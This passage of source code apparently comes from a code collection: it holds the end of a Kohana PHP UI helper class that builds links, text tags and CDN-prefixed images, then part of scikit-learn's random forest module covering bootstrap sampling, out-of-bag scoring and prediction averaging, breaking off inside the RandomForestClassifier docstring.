     * @author Michael Dyer
     * @param  string|null $base       key into defaults.config 'paths'
     * @param  string      $content    inner HTML of the anchor
     * @param  array       $attributes anchor attributes; 'href' is required
     * @return string
     */
    public static function link($base, $content, $attributes)
    {
        // NOTE(review): silently terminates the whole request when no
        // attributes are given; kept for backward compatibility, but an
        // exception would be more appropriate.
        if(!isset($attributes)) exit;
        $defaults = Kohana::$config->load('defaults');
        if(isset($base)) {
            // Prefix the href with the configured base path.
            $attributes['href'] = $defaults['paths'][$base].$attributes['href'];
        }
        return '<a'.HTML::attributes($attributes).'>'.$content.'</a>';
    }

    /**
     * Wrap $content in a dynamic tag (defaults to <span>).
     *
     *     UI::text($content, $type, $attributes);
     *
     * @author Michael Dyer
     * @param  string      $content
     * @param  string|null $type       tag name; 'span' when null
     * @param  array|null  $attributes
     * @return string
     */
    public static function text($content, $type = null, $attributes = null)
    {
        if(!isset($type)) $type = 'span';
        return '<'.$type.HTML::attributes($attributes).'>'.$content.'</'.$type.'>';
    }

    /**
     * Build an image tag whose src is prefixed with a CDN base path from
     * defaults.config (docblock previously referred to UI::image; the
     * method has always been named img).
     *
     *     UI::img($uri, $base, $attributes);
     *
     * @author Michael Dyer
     * @param  string      $uri        image path relative to the base
     * @param  string|null $base       key into defaults.config 'paths'; 'cdn' when null
     * @param  array|null  $attributes
     * @return string
     */
    public static function img($uri, $base = null, $attributes = null)
    {
        // NOTE(review): exit on missing $uri kept for backward compatibility.
        if(!isset($uri)) exit;
        $defaults = Kohana::$config->load('defaults');
        if(!isset($base)){
            $base = 'cdn';
        }
        $uri = $defaults['paths'][$base].$uri;
        return HTML::image($uri, $attributes);
    }
}
// END KOHANA UI | listenrightmeow/KOHANA-UI | modules/ui/classes/kohana/ui.php | PHP | bsd-3-clause | 2,622 |
"""
Forest of trees-based ensemble methods.
Those methods include random forests and extremely randomized trees.
The module structure is the following:
- The ``BaseForest`` base class implements a common ``fit`` method for all
the estimators in the module. The ``fit`` method of the base ``Forest``
class calls the ``fit`` method of each sub-estimator on random samples
(with replacement, a.k.a. bootstrap) of the training set.
The init of the sub-estimator is further delegated to the
``BaseEnsemble`` constructor.
- The ``ForestClassifier`` and ``ForestRegressor`` base classes further
implement the prediction logic by computing an average of the predicted
outcomes of the sub-estimators.
- The ``RandomForestClassifier`` and ``RandomForestRegressor`` derived
classes provide the user with concrete implementations of
the forest ensemble method using classical, deterministic
``DecisionTreeClassifier`` and ``DecisionTreeRegressor`` as
sub-estimator implementations.
- The ``ExtraTreesClassifier`` and ``ExtraTreesRegressor`` derived
classes provide the user with concrete implementations of the
forest ensemble method using the extremely randomized trees
``ExtraTreeClassifier`` and ``ExtraTreeRegressor`` as
sub-estimator implementations.
Single and multi-output problems are both handled.
"""
# Authors: Gilles Louppe <g.louppe@gmail.com>
# Brian Holt <bdholt1@gmail.com>
# Joly Arnaud <arnaud.v.joly@gmail.com>
# Fares Hedayati <fares.hedayati@gmail.com>
#
# License: BSD 3 clause
import numbers
from warnings import catch_warnings, simplefilter, warn
import threading
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import issparse
from scipy.sparse import hstack as sparse_hstack
from joblib import Parallel
from ..base import is_classifier
from ..base import ClassifierMixin, RegressorMixin, MultiOutputMixin
from ..metrics import accuracy_score, r2_score
from ..preprocessing import OneHotEncoder
from ..tree import (DecisionTreeClassifier, DecisionTreeRegressor,
ExtraTreeClassifier, ExtraTreeRegressor)
from ..tree._tree import DTYPE, DOUBLE
from ..utils import check_random_state, compute_sample_weight, deprecated
from ..exceptions import DataConversionWarning
from ._base import BaseEnsemble, _partition_estimators
from ..utils.fixes import delayed
from ..utils.fixes import _joblib_parallel_args
from ..utils.multiclass import check_classification_targets, type_of_target
from ..utils.validation import check_is_fitted, _check_sample_weight
__all__ = ["RandomForestClassifier",
"RandomForestRegressor",
"ExtraTreesClassifier",
"ExtraTreesRegressor",
"RandomTreesEmbedding"]
MAX_INT = np.iinfo(np.int32).max
def _get_n_samples_bootstrap(n_samples, max_samples):
"""
Get the number of samples in a bootstrap sample.
Parameters
----------
n_samples : int
Number of samples in the dataset.
max_samples : int or float
The maximum number of samples to draw from the total available:
- if float, this indicates a fraction of the total and should be
the interval `(0.0, 1.0]`;
- if int, this indicates the exact number of samples;
- if None, this indicates the total number of samples.
Returns
-------
n_samples_bootstrap : int
The total number of samples to draw for the bootstrap sample.
"""
if max_samples is None:
return n_samples
if isinstance(max_samples, numbers.Integral):
if not (1 <= max_samples <= n_samples):
msg = "`max_samples` must be in range 1 to {} but got value {}"
raise ValueError(msg.format(n_samples, max_samples))
return max_samples
if isinstance(max_samples, numbers.Real):
if not (0 < max_samples <= 1):
msg = "`max_samples` must be in range (0.0, 1.0] but got value {}"
raise ValueError(msg.format(max_samples))
return round(n_samples * max_samples)
msg = "`max_samples` should be int or float, but got type '{}'"
raise TypeError(msg.format(type(max_samples)))
def _generate_sample_indices(random_state, n_samples, n_samples_bootstrap):
    """
    Draw the bootstrap sample indices for a single tree.

    Private helper used by the _parallel_build_trees function: returns
    ``n_samples_bootstrap`` indices drawn uniformly at random, with
    replacement, from ``range(n_samples)``.
    """
    rng = check_random_state(random_state)
    return rng.randint(0, n_samples, n_samples_bootstrap)
def _generate_unsampled_indices(random_state, n_samples, n_samples_bootstrap):
    """
    Compute the out-of-bag indices for a single tree.

    Private helper used by the forest._set_oob_score function: re-draws the
    tree's bootstrap sample (same ``random_state``) and returns, in
    increasing order, every index in ``range(n_samples)`` that was never
    drawn.
    """
    drawn = _generate_sample_indices(random_state, n_samples,
                                     n_samples_bootstrap)
    draw_counts = np.bincount(drawn, minlength=n_samples)
    # Indices with a zero draw count are the out-of-bag samples.
    return np.flatnonzero(draw_counts == 0)
def _parallel_build_trees(tree, forest, X, y, sample_weight, tree_idx, n_trees,
                          verbose=0, class_weight=None,
                          n_samples_bootstrap=None):
    """
    Private function used to fit a single tree in parallel."""
    if verbose > 1:
        print("building tree %d of %d" % (tree_idx + 1, n_trees))
    if forest.bootstrap:
        n_samples = X.shape[0]
        if sample_weight is None:
            curr_sample_weight = np.ones((n_samples,), dtype=np.float64)
        else:
            curr_sample_weight = sample_weight.copy()
        # Bootstrap is emulated through sample weights: each sample's weight
        # is multiplied by the number of times it was drawn, so X itself is
        # never copied per tree.
        indices = _generate_sample_indices(tree.random_state, n_samples,
                                           n_samples_bootstrap)
        sample_counts = np.bincount(indices, minlength=n_samples)
        curr_sample_weight *= sample_counts
        if class_weight == 'subsample':
            # Legacy option: 'auto' class weighting computed on the bootstrap
            # sample; the DeprecationWarning it emits is silenced here.
            with catch_warnings():
                simplefilter('ignore', DeprecationWarning)
                curr_sample_weight *= compute_sample_weight('auto', y,
                                                            indices=indices)
        elif class_weight == 'balanced_subsample':
            # 'balanced' class weighting computed on the bootstrap sample.
            curr_sample_weight *= compute_sample_weight('balanced', y,
                                                        indices=indices)
        tree.fit(X, y, sample_weight=curr_sample_weight, check_input=False)
    else:
        # No bootstrap: fit on the full dataset with the caller's weights.
        tree.fit(X, y, sample_weight=sample_weight, check_input=False)
    return tree
class BaseForest(MultiOutputMixin, BaseEnsemble, metaclass=ABCMeta):
    """
    Base class for forests of trees.
    Warning: This class should not be used directly. Use derived classes
    instead.
    """
    @abstractmethod
    def __init__(self,
                 base_estimator,
                 n_estimators=100, *,
                 estimator_params=tuple(),
                 bootstrap=False,
                 oob_score=False,
                 n_jobs=None,
                 random_state=None,
                 verbose=0,
                 warm_start=False,
                 class_weight=None,
                 max_samples=None):
        super().__init__(
            base_estimator=base_estimator,
            n_estimators=n_estimators,
            estimator_params=estimator_params)
        self.bootstrap = bootstrap
        self.oob_score = oob_score
        self.n_jobs = n_jobs
        self.random_state = random_state
        self.verbose = verbose
        self.warm_start = warm_start
        self.class_weight = class_weight
        self.max_samples = max_samples
    def apply(self, X):
        """
        Apply trees in the forest to X, return leaf indices.
        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features)
            The input samples. Internally, its dtype will be converted to
            ``dtype=np.float32``. If a sparse matrix is provided, it will be
            converted into a sparse ``csr_matrix``.
        Returns
        -------
        X_leaves : ndarray of shape (n_samples, n_estimators)
            For each datapoint x in X and for each tree in the forest,
            return the index of the leaf x ends up in.
        """
        X = self._validate_X_predict(X)
        # One parallel task per tree; results are stacked tree-major, hence
        # the final transpose to get (n_samples, n_estimators).
        results = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,
                           **_joblib_parallel_args(prefer="threads"))(
            delayed(tree.apply)(X, check_input=False)
            for tree in self.estimators_)
        return np.array(results).T
    def decision_path(self, X):
        """
        Return the decision path in the forest.
        .. versionadded:: 0.18
        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features)
            The input samples. Internally, its dtype will be converted to
            ``dtype=np.float32``. If a sparse matrix is provided, it will be
            converted into a sparse ``csr_matrix``.
        Returns
        -------
        indicator : sparse matrix of shape (n_samples, n_nodes)
            Return a node indicator matrix where non zero elements indicates
            that the samples goes through the nodes. The matrix is of CSR
            format.
        n_nodes_ptr : ndarray of shape (n_estimators + 1,)
            The columns from indicator[n_nodes_ptr[i]:n_nodes_ptr[i+1]]
            gives the indicator value for the i-th estimator.
        """
        X = self._validate_X_predict(X)
        indicators = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,
                              **_joblib_parallel_args(prefer='threads'))(
            delayed(tree.decision_path)(X, check_input=False)
            for tree in self.estimators_)
        # Per-tree indicator matrices are concatenated column-wise; the
        # cumulative node counts let callers slice out each tree's columns.
        n_nodes = [0]
        n_nodes.extend([i.shape[1] for i in indicators])
        n_nodes_ptr = np.array(n_nodes).cumsum()
        return sparse_hstack(indicators).tocsr(), n_nodes_ptr
    def fit(self, X, y, sample_weight=None):
        """
        Build a forest of trees from the training set (X, y).
        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features)
            The training input samples. Internally, its dtype will be converted
            to ``dtype=np.float32``. If a sparse matrix is provided, it will be
            converted into a sparse ``csc_matrix``.
        y : array-like of shape (n_samples,) or (n_samples, n_outputs)
            The target values (class labels in classification, real numbers in
            regression).
        sample_weight : array-like of shape (n_samples,), default=None
            Sample weights. If None, then samples are equally weighted. Splits
            that would create child nodes with net zero or negative weight are
            ignored while searching for a split in each node. In the case of
            classification, splits are also ignored if they would result in any
            single class carrying a negative weight in either child node.
        Returns
        -------
        self : object
        """
        # Validate or convert input data
        if issparse(y):
            raise ValueError(
                "sparse multilabel-indicator for y is not supported."
            )
        X, y = self._validate_data(X, y, multi_output=True,
                                   accept_sparse="csc", dtype=DTYPE)
        if sample_weight is not None:
            sample_weight = _check_sample_weight(sample_weight, X)
        if issparse(X):
            # Pre-sort indices to avoid that each individual tree of the
            # ensemble sorts the indices.
            X.sort_indices()
        # Normalize y to shape (n_samples, n_outputs).
        y = np.atleast_1d(y)
        if y.ndim == 2 and y.shape[1] == 1:
            warn("A column-vector y was passed when a 1d array was"
                 " expected. Please change the shape of y to "
                 "(n_samples,), for example using ravel().",
                 DataConversionWarning, stacklevel=2)
        if y.ndim == 1:
            # reshape is necessary to preserve the data contiguity against vs
            # [:, np.newaxis] that does not.
            y = np.reshape(y, (-1, 1))
        if self.criterion == "poisson":
            if np.any(y < 0):
                raise ValueError("Some value(s) of y are negative which is "
                                 "not allowed for Poisson regression.")
            if np.sum(y) <= 0:
                raise ValueError("Sum of y is not strictly positive which "
                                 "is necessary for Poisson regression.")
        self.n_outputs_ = y.shape[1]
        y, expanded_class_weight = self._validate_y_class_weight(y)
        if getattr(y, "dtype", None) != DOUBLE or not y.flags.contiguous:
            y = np.ascontiguousarray(y, dtype=DOUBLE)
        if expanded_class_weight is not None:
            # Class weights are folded into the per-sample weights.
            if sample_weight is not None:
                sample_weight = sample_weight * expanded_class_weight
            else:
                sample_weight = expanded_class_weight
        # Get bootstrap sample size
        n_samples_bootstrap = _get_n_samples_bootstrap(
            n_samples=X.shape[0],
            max_samples=self.max_samples
        )
        # Check parameters
        self._validate_estimator()
        # TODO: Remove in v1.2
        if isinstance(self, (RandomForestRegressor, ExtraTreesRegressor)):
            if self.criterion == "mse":
                warn(
                    "Criterion 'mse' was deprecated in v1.0 and will be "
                    "removed in version 1.2. Use `criterion='squared_error'` "
                    "which is equivalent.",
                    FutureWarning
                )
            elif self.criterion == "mae":
                warn(
                    "Criterion 'mae' was deprecated in v1.0 and will be "
                    "removed in version 1.2. Use `criterion='absolute_error'` "
                    "which is equivalent.",
                    FutureWarning
                )
        if not self.bootstrap and self.oob_score:
            raise ValueError("Out of bag estimation only available"
                             " if bootstrap=True")
        random_state = check_random_state(self.random_state)
        if not self.warm_start or not hasattr(self, "estimators_"):
            # Free allocated memory, if any
            self.estimators_ = []
        n_more_estimators = self.n_estimators - len(self.estimators_)
        if n_more_estimators < 0:
            raise ValueError('n_estimators=%d must be larger or equal to '
                             'len(estimators_)=%d when warm_start==True'
                             % (self.n_estimators, len(self.estimators_)))
        elif n_more_estimators == 0:
            warn("Warm-start fitting without increasing n_estimators does not "
                 "fit new trees.")
        else:
            if self.warm_start and len(self.estimators_) > 0:
                # We draw from the random state to get the random state we
                # would have got if we hadn't used a warm_start.
                random_state.randint(MAX_INT, size=len(self.estimators_))
            trees = [self._make_estimator(append=False,
                                          random_state=random_state)
                     for i in range(n_more_estimators)]
            # Parallel loop: we prefer the threading backend as the Cython code
            # for fitting the trees is internally releasing the Python GIL
            # making threading more efficient than multiprocessing in
            # that case. However, for joblib 0.12+ we respect any
            # parallel_backend contexts set at a higher level,
            # since correctness does not rely on using threads.
            trees = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,
                             **_joblib_parallel_args(prefer='threads'))(
                delayed(_parallel_build_trees)(
                    t, self, X, y, sample_weight, i, len(trees),
                    verbose=self.verbose, class_weight=self.class_weight,
                    n_samples_bootstrap=n_samples_bootstrap)
                for i, t in enumerate(trees))
            # Collect newly grown trees
            self.estimators_.extend(trees)
        if self.oob_score:
            y_type = type_of_target(y)
            if y_type in ("multiclass-multioutput", "unknown"):
                # FIXME: we could consider to support multiclass-multioutput if
                # we introduce or reuse a constructor parameter (e.g.
                # oob_score) allowing our user to pass a callable defining the
                # scoring strategy on OOB sample.
                raise ValueError(
                    f"The type of target cannot be used to compute OOB "
                    f"estimates. Got {y_type} while only the following are "
                    f"supported: continuous, continuous-multioutput, binary, "
                    f"multiclass, multilabel-indicator."
                )
            self._set_oob_score_and_attributes(X, y)
        # Decapsulate classes_ attributes
        if hasattr(self, "classes_") and self.n_outputs_ == 1:
            self.n_classes_ = self.n_classes_[0]
            self.classes_ = self.classes_[0]
        return self
    @abstractmethod
    def _set_oob_score_and_attributes(self, X, y):
        """Compute and set the OOB score and attributes.
        Parameters
        ----------
        X : array-like of shape (n_samples, n_features)
            The data matrix.
        y : ndarray of shape (n_samples, n_outputs)
            The target matrix.
        """
    def _compute_oob_predictions(self, X, y):
        """Compute and set the OOB score.
        Parameters
        ----------
        X : array-like of shape (n_samples, n_features)
            The data matrix.
        y : ndarray of shape (n_samples, n_outputs)
            The target matrix.
        Returns
        -------
        oob_pred : ndarray of shape (n_samples, n_classes, n_outputs) or \
                (n_samples, 1, n_outputs)
            The OOB predictions.
        """
        X = self._validate_data(X, dtype=DTYPE, accept_sparse='csr',
                                reset=False)
        n_samples = y.shape[0]
        n_outputs = self.n_outputs_
        if is_classifier(self) and hasattr(self, "n_classes_"):
            # n_classes_ is a ndarray at this stage
            # all the supported type of target will have the same number of
            # classes in all outputs
            oob_pred_shape = (n_samples, self.n_classes_[0], n_outputs)
        else:
            # for regression, n_classes_ does not exist and we create an empty
            # axis to be consistent with the classification case and make
            # the array operations compatible with the 2 settings
            oob_pred_shape = (n_samples, 1, n_outputs)
        oob_pred = np.zeros(shape=oob_pred_shape, dtype=np.float64)
        n_oob_pred = np.zeros((n_samples, n_outputs), dtype=np.int64)
        n_samples_bootstrap = _get_n_samples_bootstrap(
            n_samples, self.max_samples,
        )
        # Accumulate each tree's predictions over the samples that tree
        # never saw during fitting; n_oob_pred counts the contributions.
        for estimator in self.estimators_:
            unsampled_indices = _generate_unsampled_indices(
                estimator.random_state, n_samples, n_samples_bootstrap,
            )
            y_pred = self._get_oob_predictions(
                estimator, X[unsampled_indices, :]
            )
            oob_pred[unsampled_indices, ...] += y_pred
            n_oob_pred[unsampled_indices, :] += 1
        # NOTE: the zero-count check runs inside the loop but mutates
        # n_oob_pred, so the warning can fire at most once.
        for k in range(n_outputs):
            if (n_oob_pred == 0).any():
                warn(
                    "Some inputs do not have OOB scores. This probably means "
                    "too few trees were used to compute any reliable OOB "
                    "estimates.", UserWarning
                )
                n_oob_pred[n_oob_pred == 0] = 1
            oob_pred[..., k] /= n_oob_pred[..., [k]]
        return oob_pred
    def _validate_y_class_weight(self, y):
        # Default implementation
        return y, None
    def _validate_X_predict(self, X):
        """
        Validate X whenever one tries to predict, apply, predict_proba."""
        check_is_fitted(self)
        # Delegate to the first tree; all trees share the same input spec.
        return self.estimators_[0]._validate_X_predict(X, check_input=True)
    @property
    def feature_importances_(self):
        """
        The impurity-based feature importances.
        The higher, the more important the feature.
        The importance of a feature is computed as the (normalized)
        total reduction of the criterion brought by that feature.  It is also
        known as the Gini importance.
        Warning: impurity-based feature importances can be misleading for
        high cardinality features (many unique values). See
        :func:`sklearn.inspection.permutation_importance` as an alternative.
        Returns
        -------
        feature_importances_ : ndarray of shape (n_features,)
            The values of this array sum to 1, unless all trees are single node
            trees consisting of only the root node, in which case it will be an
            array of zeros.
        """
        check_is_fitted(self)
        # Single-node (root-only) trees carry no importance information and
        # are excluded from the average.
        all_importances = Parallel(n_jobs=self.n_jobs,
                                   **_joblib_parallel_args(prefer='threads'))(
            delayed(getattr)(tree, 'feature_importances_')
            for tree in self.estimators_ if tree.tree_.node_count > 1)
        if not all_importances:
            return np.zeros(self.n_features_in_, dtype=np.float64)
        all_importances = np.mean(all_importances,
                                  axis=0, dtype=np.float64)
        return all_importances / np.sum(all_importances)
    # TODO: Remove in 1.2
    # mypy error: Decorated property not supported
    @deprecated(  # type: ignore
        "Attribute n_features_ was deprecated in version 1.0 and will be "
        "removed in 1.2. Use 'n_features_in_' instead."
    )
    @property
    def n_features_(self):
        return self.n_features_in_
def _accumulate_prediction(predict, X, out, lock):
"""
This is a utility function for joblib's Parallel.
It can't go locally in ForestClassifier or ForestRegressor, because joblib
complains that it cannot pickle it when placed there.
"""
prediction = predict(X, check_input=False)
with lock:
if len(out) == 1:
out[0] += prediction
else:
for i in range(len(out)):
out[i] += prediction[i]
class ForestClassifier(ClassifierMixin, BaseForest, metaclass=ABCMeta):
"""
Base class for forest of trees-based classifiers.
Warning: This class should not be used directly. Use derived classes
instead.
"""
@abstractmethod
def __init__(self,
base_estimator,
n_estimators=100, *,
estimator_params=tuple(),
bootstrap=False,
oob_score=False,
n_jobs=None,
random_state=None,
verbose=0,
warm_start=False,
class_weight=None,
max_samples=None):
super().__init__(
base_estimator,
n_estimators=n_estimators,
estimator_params=estimator_params,
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start,
class_weight=class_weight,
max_samples=max_samples)
@staticmethod
def _get_oob_predictions(tree, X):
"""Compute the OOB predictions for an individual tree.
Parameters
----------
tree : DecisionTreeClassifier object
A single decision tree classifier.
X : ndarray of shape (n_samples, n_features)
The OOB samples.
Returns
-------
y_pred : ndarray of shape (n_samples, n_classes, n_outputs)
The OOB associated predictions.
"""
y_pred = tree.predict_proba(X, check_input=False)
y_pred = np.array(y_pred, copy=False)
if y_pred.ndim == 2:
# binary and multiclass
y_pred = y_pred[..., np.newaxis]
else:
# Roll the first `n_outputs` axis to the last axis. We will reshape
# from a shape of (n_outputs, n_samples, n_classes) to a shape of
# (n_samples, n_classes, n_outputs).
y_pred = np.rollaxis(y_pred, axis=0, start=3)
return y_pred
def _set_oob_score_and_attributes(self, X, y):
"""Compute and set the OOB score and attributes.
Parameters
----------
X : array-like of shape (n_samples, n_features)
The data matrix.
y : ndarray of shape (n_samples, n_outputs)
The target matrix.
"""
self.oob_decision_function_ = super()._compute_oob_predictions(X, y)
if self.oob_decision_function_.shape[-1] == 1:
# drop the n_outputs axis if there is a single output
self.oob_decision_function_ = self.oob_decision_function_.squeeze(
axis=-1
)
self.oob_score_ = accuracy_score(
y, np.argmax(self.oob_decision_function_, axis=1)
)
def _validate_y_class_weight(self, y):
check_classification_targets(y)
y = np.copy(y)
expanded_class_weight = None
if self.class_weight is not None:
y_original = np.copy(y)
self.classes_ = []
self.n_classes_ = []
y_store_unique_indices = np.zeros(y.shape, dtype=int)
for k in range(self.n_outputs_):
classes_k, y_store_unique_indices[:, k] = \
np.unique(y[:, k], return_inverse=True)
self.classes_.append(classes_k)
self.n_classes_.append(classes_k.shape[0])
y = y_store_unique_indices
if self.class_weight is not None:
valid_presets = ('balanced', 'balanced_subsample')
if isinstance(self.class_weight, str):
if self.class_weight not in valid_presets:
raise ValueError('Valid presets for class_weight include '
'"balanced" and "balanced_subsample".'
'Given "%s".'
% self.class_weight)
if self.warm_start:
warn('class_weight presets "balanced" or '
'"balanced_subsample" are '
'not recommended for warm_start if the fitted data '
'differs from the full dataset. In order to use '
'"balanced" weights, use compute_class_weight '
'("balanced", classes, y). In place of y you can use '
'a large enough sample of the full training set '
'target to properly estimate the class frequency '
'distributions. Pass the resulting weights as the '
'class_weight parameter.')
if (self.class_weight != 'balanced_subsample' or
not self.bootstrap):
if self.class_weight == "balanced_subsample":
class_weight = "balanced"
else:
class_weight = self.class_weight
expanded_class_weight = compute_sample_weight(class_weight,
y_original)
return y, expanded_class_weight
def predict(self, X):
"""
Predict class for X.
The predicted class of an input sample is a vote by the trees in
the forest, weighted by their probability estimates. That is,
the predicted class is the one with highest mean probability
estimate across the trees.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
The input samples. Internally, its dtype will be converted to
``dtype=np.float32``. If a sparse matrix is provided, it will be
converted into a sparse ``csr_matrix``.
Returns
-------
y : ndarray of shape (n_samples,) or (n_samples, n_outputs)
The predicted classes.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return self.classes_.take(np.argmax(proba, axis=1), axis=0)
else:
n_samples = proba[0].shape[0]
# all dtypes should be the same, so just take the first
class_type = self.classes_[0].dtype
predictions = np.empty((n_samples, self.n_outputs_),
dtype=class_type)
for k in range(self.n_outputs_):
predictions[:, k] = self.classes_[k].take(np.argmax(proba[k],
axis=1),
axis=0)
return predictions
def predict_proba(self, X):
    """
    Predict class probabilities for X.

    The predicted class probabilities of an input sample are computed as
    the mean predicted class probabilities of the trees in the forest.
    The class probability of a single tree is the fraction of samples of
    the same class in a leaf.

    Parameters
    ----------
    X : {array-like, sparse matrix} of shape (n_samples, n_features)
        The input samples. Internally, its dtype will be converted to
        ``dtype=np.float32``. If a sparse matrix is provided, it will be
        converted into a sparse ``csr_matrix``.

    Returns
    -------
    p : ndarray of shape (n_samples, n_classes), or a list of such arrays
        The class probabilities of the input samples. The order of the
        classes corresponds to that in the attribute :term:`classes_`.
    """
    check_is_fitted(self)
    # Validate/convert the input once, up front.
    X = self._validate_X_predict(X)

    # Split the trees into chunks, one chunk per joblib worker.
    n_jobs, _, _ = _partition_estimators(self.n_estimators, self.n_jobs)

    # One shared accumulator per output; summing in place avoids keeping
    # every tree's probability array alive at once.
    out = [np.zeros((X.shape[0], n_cls), dtype=np.float64)
           for n_cls in np.atleast_1d(self.n_classes_)]
    lock = threading.Lock()
    Parallel(n_jobs=n_jobs, verbose=self.verbose,
             **_joblib_parallel_args(require="sharedmem"))(
        delayed(_accumulate_prediction)(tree.predict_proba, X, out, lock)
        for tree in self.estimators_)

    # Convert accumulated sums into means over the forest.
    n_trees = len(self.estimators_)
    for acc in out:
        acc /= n_trees

    return out[0] if len(out) == 1 else out
def predict_log_proba(self, X):
    """
    Predict class log-probabilities for X.

    The predicted class log-probabilities of an input sample is computed as
    the log of the mean predicted class probabilities of the trees in the
    forest.

    Parameters
    ----------
    X : {array-like, sparse matrix} of shape (n_samples, n_features)
        The input samples. Internally, its dtype will be converted to
        ``dtype=np.float32``. If a sparse matrix is provided, it will be
        converted into a sparse ``csr_matrix``.

    Returns
    -------
    p : ndarray of shape (n_samples, n_classes), or a list of such arrays
        The class probabilities of the input samples. The order of the
        classes corresponds to that in the attribute :term:`classes_`.
    """
    proba = self.predict_proba(X)

    # Single output: one probability array, log it directly.
    if self.n_outputs_ == 1:
        return np.log(proba)

    # Multi-output: replace each per-output array with its elementwise log.
    for idx, per_output in enumerate(proba):
        proba[idx] = np.log(per_output)
    return proba
class ForestRegressor(RegressorMixin, BaseForest, metaclass=ABCMeta):
    """
    Base class for forest of trees-based regressors.

    Warning: This class should not be used directly. Use derived classes
    instead.
    """

    @abstractmethod
    def __init__(self,
                 base_estimator,
                 n_estimators=100, *,
                 estimator_params=tuple(),
                 bootstrap=False,
                 oob_score=False,
                 n_jobs=None,
                 random_state=None,
                 verbose=0,
                 warm_start=False,
                 max_samples=None):
        # Pure pass-through constructor: every argument is forwarded
        # unchanged to BaseForest; this class adds no state of its own.
        super().__init__(
            base_estimator,
            n_estimators=n_estimators,
            estimator_params=estimator_params,
            bootstrap=bootstrap,
            oob_score=oob_score,
            n_jobs=n_jobs,
            random_state=random_state,
            verbose=verbose,
            warm_start=warm_start,
            max_samples=max_samples)

    def predict(self, X):
        """
        Predict regression target for X.

        The predicted regression target of an input sample is computed as the
        mean predicted regression targets of the trees in the forest.

        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features)
            The input samples. Internally, its dtype will be converted to
            ``dtype=np.float32``. If a sparse matrix is provided, it will be
            converted into a sparse ``csr_matrix``.

        Returns
        -------
        y : ndarray of shape (n_samples,) or (n_samples, n_outputs)
            The predicted values.
        """
        check_is_fitted(self)
        # Check data
        X = self._validate_X_predict(X)
        # Assign chunk of trees to jobs
        n_jobs, _, _ = _partition_estimators(self.n_estimators, self.n_jobs)
        # avoid storing the output of every estimator by summing them here
        if self.n_outputs_ > 1:
            y_hat = np.zeros((X.shape[0], self.n_outputs_), dtype=np.float64)
        else:
            y_hat = np.zeros((X.shape[0]), dtype=np.float64)
        # Parallel loop: workers share the single y_hat buffer
        # ("sharedmem") and the lock serializes the in-place accumulation.
        lock = threading.Lock()
        Parallel(n_jobs=n_jobs, verbose=self.verbose,
                 **_joblib_parallel_args(require="sharedmem"))(
            delayed(_accumulate_prediction)(e.predict, X, [y_hat], lock)
            for e in self.estimators_)
        # Turn the accumulated sum into the mean over all trees.
        y_hat /= len(self.estimators_)
        return y_hat

    @staticmethod
    def _get_oob_predictions(tree, X):
        """Compute the OOB predictions for an individual tree.

        Parameters
        ----------
        tree : DecisionTreeRegressor object
            A single decision tree regressor.
        X : ndarray of shape (n_samples, n_features)
            The OOB samples.

        Returns
        -------
        y_pred : ndarray of shape (n_samples, 1, n_outputs)
            The OOB associated predictions.
        """
        y_pred = tree.predict(X, check_input=False)
        # Normalize both cases to the 3-D (n_samples, 1, n_outputs) layout
        # expected by the OOB aggregation machinery.
        if y_pred.ndim == 1:
            # single output regression
            y_pred = y_pred[:, np.newaxis, np.newaxis]
        else:
            # multioutput regression
            y_pred = y_pred[:, np.newaxis, :]
        return y_pred

    def _set_oob_score_and_attributes(self, X, y):
        """Compute and set the OOB score and attributes.

        Sets ``oob_prediction_`` and ``oob_score_`` (R^2 of the OOB
        predictions against ``y``).

        Parameters
        ----------
        X : array-like of shape (n_samples, n_features)
            The data matrix.
        y : ndarray of shape (n_samples, n_outputs)
            The target matrix.
        """
        # _compute_oob_predictions returns (n_samples, 1, n_outputs);
        # drop the middle singleton axis first.
        self.oob_prediction_ = super()._compute_oob_predictions(X, y).squeeze(
            axis=1
        )
        if self.oob_prediction_.shape[-1] == 1:
            # drop the n_outputs axis if there is a single output
            self.oob_prediction_ = self.oob_prediction_.squeeze(axis=-1)
        self.oob_score_ = r2_score(y, self.oob_prediction_)

    def _compute_partial_dependence_recursion(self, grid, target_features):
        """Fast partial dependence computation.

        Parameters
        ----------
        grid : ndarray of shape (n_samples, n_target_features)
            The grid points on which the partial dependence should be
            evaluated.
        target_features : ndarray of shape (n_target_features)
            The set of target features for which the partial dependence
            should be evaluated.

        Returns
        -------
        averaged_predictions : ndarray of shape (n_samples,)
            The value of the partial dependence function on each grid point.
        """
        grid = np.asarray(grid, dtype=DTYPE, order='C')
        averaged_predictions = np.zeros(shape=grid.shape[0],
                                        dtype=np.float64, order='C')
        for tree in self.estimators_:
            # Note: we don't sum in parallel because the GIL isn't released in
            # the fast method.
            tree.tree_.compute_partial_dependence(
                grid, target_features, averaged_predictions)
        # Average over the forest
        averaged_predictions /= len(self.estimators_)
        return averaged_predictions
class RandomForestClassifier(ForestClassifier):
    """
    A random forest classifier.

    A random forest is a meta estimator that fits a number of decision tree
    classifiers on various sub-samples of the dataset and uses averaging to
    improve the predictive accuracy and control over-fitting.
    The sub-sample size is controlled with the `max_samples` parameter if
    `bootstrap=True` (default), otherwise the whole dataset is used to build
    each tree.

    Read more in the :ref:`User Guide <forest>`.

    Parameters
    ----------
    n_estimators : int, default=100
        The number of trees in the forest.

        .. versionchanged:: 0.22
           The default value of ``n_estimators`` changed from 10 to 100
           in 0.22.

    criterion : {"gini", "entropy"}, default="gini"
        The function to measure the quality of a split. Supported criteria are
        "gini" for the Gini impurity and "entropy" for the information gain.
        Note: this parameter is tree-specific.

    max_depth : int, default=None
        The maximum depth of the tree. If None, then nodes are expanded until
        all leaves are pure or until all leaves contain less than
        min_samples_split samples.

    min_samples_split : int or float, default=2
        The minimum number of samples required to split an internal node:

        - If int, then consider `min_samples_split` as the minimum number.
